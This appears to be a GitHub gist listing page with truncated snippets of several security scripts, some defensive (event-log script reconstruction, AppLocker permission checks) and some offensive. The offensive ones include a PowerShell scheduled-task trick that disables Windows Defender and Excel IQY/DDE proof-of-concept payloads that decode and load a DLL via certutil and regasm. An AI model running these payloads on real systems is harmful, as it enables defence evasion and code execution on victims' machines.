🐦
I saw a birb

Jacques Pharand Spacecow99

@Trenly
Trenly / README.md
Last active March 13, 2024 09:04
Install Winget to the Windows Sandbox Base Image

This powershell script modifies the Base Image, or the Virtual Hard Disk, which the Windows Sandbox launches upon startup. It will copy the required files to the sandbox and add a registry key which will install them upon startup. By default the script will install the latest stable release of Winget. You can specify to use the latest pre-release with the -PreRelease switch.

When a new version of Winget is released, run this script again to update the installation in the sandbox to the latest version

@vikas891
vikas891 / ExtractAllScripts.ps1
Last active May 1, 2024 20:26
A PowerShell script to re-construct a suspicious .PS1 from script-blocks recorded in Event ID 4104
#Usage:
#
#NOTE: The script expects an argument which is the full File Path of the EVTX file.
#
#C:\>ExtractAllScripts.ps1
#The default behavior of the script is to assimilate and extract every script/command to disk.
#
#C:\ExtractAllScripts -List
#This will only list Script Block IDs with their associated Script Names (if logged).
#
@tyranid
tyranid / doh.ps1
Created May 4, 2020 15:17
Something or other.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
@cetaSYN
cetaSYN / mdns_comm.py
Last active January 25, 2020 18:34
Communicate between subnets by leveraging mDNS DNS-SD TXT records and mDNS reflection
#!/usr/bin/env python3
__author__ = 'cetaSYN'
import argparse
import queue
import signal
import socket
import sys
import threading
@Mr-Un1k0d3r
Mr-Un1k0d3r / remote.iqy
Last active April 27, 2022 19:25
IQY File Remote Payload POC
=cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1'
@Mr-Un1k0d3r
Mr-Un1k0d3r / poc.iqy
Created August 1, 2018 18:59
IQY File + Embedded DLL POC
WEB
1
https://ringzer0team.com/IQY
Selection=EntirePage
Formatting=RTF
PreFormattedTextToColumns=True
ConsecutiveDelimitersAsOne=True
SingleBlockTextImport=False
DisableDateRecognition=False
RDP Eavesdropping and Hijacking
*******************************
I spent some time this evening looking at ways to eavesdrop and hijack RDP sessions. Here is a gist of (semi) interesting findings that are not very new...
===========
Inspiration
===========
As you may already know...
@cryptolok
cryptolok / FirmAD.sh
Created February 28, 2018 00:24
Firmware Automatic Dumping & Extraction Tool
#!/bin/bash
# this tool will automate firmware extraction and unpacking using FT232R-type adaptors (like BusPirate) and a SOIC clip placed on a chip to dump
# install the necessary software:
#$ sudo apt install flashrom binwalk || echo 'git clone?'
# pump up binwalk with additional packages and libraries
#$ bash <(curl -s https://raw.githubusercontent.com/devttys0/binwalk/master/deps.sh)
# place the clip on the chip, connect it to the adaptor, which should be connected to your PC (with drivers installed), and launch the script:
# chip => clip => adaptor => PC => script
@api0cradle
api0cradle / AccessChk.bat
Last active September 11, 2023 10:17
AppLocker hardening
accesschk -w -s -u Users "C:\Program Files" >> programfiles.txt
accesschk -w -s -u Everyone "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "Authenticated Users" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u Interactive "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "This Organization" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "Authentication authority asserted identity" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "Mandatory Label\Medium Mandatory Level" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u %username% "C:\Program Files" >> programfiles.txt
accesschk -w -s -u Users "C:\Program Files (x86)" >> programfilesx86.txt